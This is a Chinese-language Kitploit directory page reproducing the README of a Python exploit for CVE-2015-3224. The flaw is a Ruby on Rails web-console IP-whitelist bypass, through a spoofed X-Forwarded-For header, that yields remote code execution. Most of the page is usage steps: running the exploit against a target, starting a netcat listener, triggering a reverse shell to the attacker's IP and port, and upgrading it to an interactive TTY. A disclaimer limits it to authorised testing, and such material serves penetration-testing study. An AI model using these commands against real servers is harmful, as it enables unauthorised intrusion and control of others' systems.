Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2015-3224 — Ruby on Rails Web 控制台漏洞利用 (CVE-2015-3224) | Kitploit
工具/GitHubGitHub/sic4rio/cve-2015-3224
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育远程访问工具
GitHubsic4rio/cve-2015-3224

CVE-2015-3224

Ruby on Rails Web 控制台漏洞利用 (CVE-2015-3224)

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Ruby on Rails Web 控制台漏洞利用 (CVE-2015-3224)

CVE-2015-3224

此仓库包含一个 Python 脚本,用于利用 Ruby on Rails 4.0.x 和 4.1.x 开发者 Web 控制台中的 IP 白名单绕过漏洞。该脚本可在易受攻击的服务器上实现 远程代码执行。

⚠️ 免责声明 此脚本仅用于教育目的和经授权的安全测试。 请勿在未经明确许可的情况下在任何系统上使用它。 作者不承担任何因使用此脚本而导致的滥用或损害责任。


📌 漏洞描述

在易受攻击的 Ruby on Rails 版本中,Web 控制台仅供开发用途,应只能从受信任的 IP 地址访问。然而,由于对 X-Forwarded-For HTTP 头的处理不当,攻击者可以伪造其 IP 地址,使其看起来像是受信任的本地用户(例如 127.0.0.1 或 ::1)。这绕过了 IP 白名单,并授予未经授权的访问权限,进而导致远程代码执行。


🚀 功能特性

  • 易于使用:简单的命令行界面。
  • 动态路径发现:自动探测目标,以找到动态的控制台会话路径。
  • 两种 Shell 模式:
    • 简单 Shell:一种基本的非交互式 Shell,用于快速执行命令。
    • 反向 TTY Shell:一条命令即可获得完全交互式的 PTY 反向 Shell。
  • 增强可读性:状态消息、成功和错误均使用颜色编码输出。
  • 健壮性:包含针对网络问题和命令失败的错误处理。

✅ 环境要求

  • Python 3
  • requests 库

安装 requests:

root@kitploit:~
pip install requests

⚙️ 使用方法

  1. 克隆仓库:

    root@kitploit:~
    git clone https://github.com/Sic4rio/CVE-2015-3224
    cd <repo-directory>
    
  2. 为脚本添加可执行权限:

    root@kitploit:~
    chmod +x exploit.py
    

选项 1:简单交互式 Shell

此模式适用于运行快速、简单的命令。

root@kitploit:~
./exploit.py -t http://<TARGET_IP>:<PORT>

选项 2:完整交互式 TTY(反向 Shell)

这是获得稳定、完全交互式 Shell 的推荐模式。

第 1 步:启动监听器

在本地机器上,打开一个新的终端并启动一个 netcat 监听器。

root@kitploit:~
nc -lvnp 9001

第 2 步:运行漏洞利用脚本

在另一个终端中,使用 --rev-shell 标志运行脚本,并提供你的本地 IP(lhost)和端口(lport)。

root@kitploit:~
./exploit.py -t http://<TARGET_IP>:<PORT> --rev-shell --lhost <YOUR_IP> --lport 9001

第 3 步:稳定 Shell

你的 netcat 监听器将收到一个连接。要将其升级为完全交互式的 TTY,请在 netcat 窗口 中执行以下步骤:

  1. 按 Ctrl+Z 将 Shell 置于后台。
  2. 将本地终端设置为原始模式并将 Shell 调到前台。
    root@kitploit:~
    stty raw -echo; fg
    
    如果提示符没有重新出现,请按 Enter。
  3. 在远程 Shell 上设置终端属性。
    root@kitploit:~
    reset
    export SHELL=bash
    export TERM=xterm-256color
    stty rows 50 cols 120
    

现在你就拥有了一个功能完整且稳定的 Shell!


👥 致谢

  • 原始漏洞利用:Eval(@0xEval)
  • Readme.md 文件:GPT
下载工具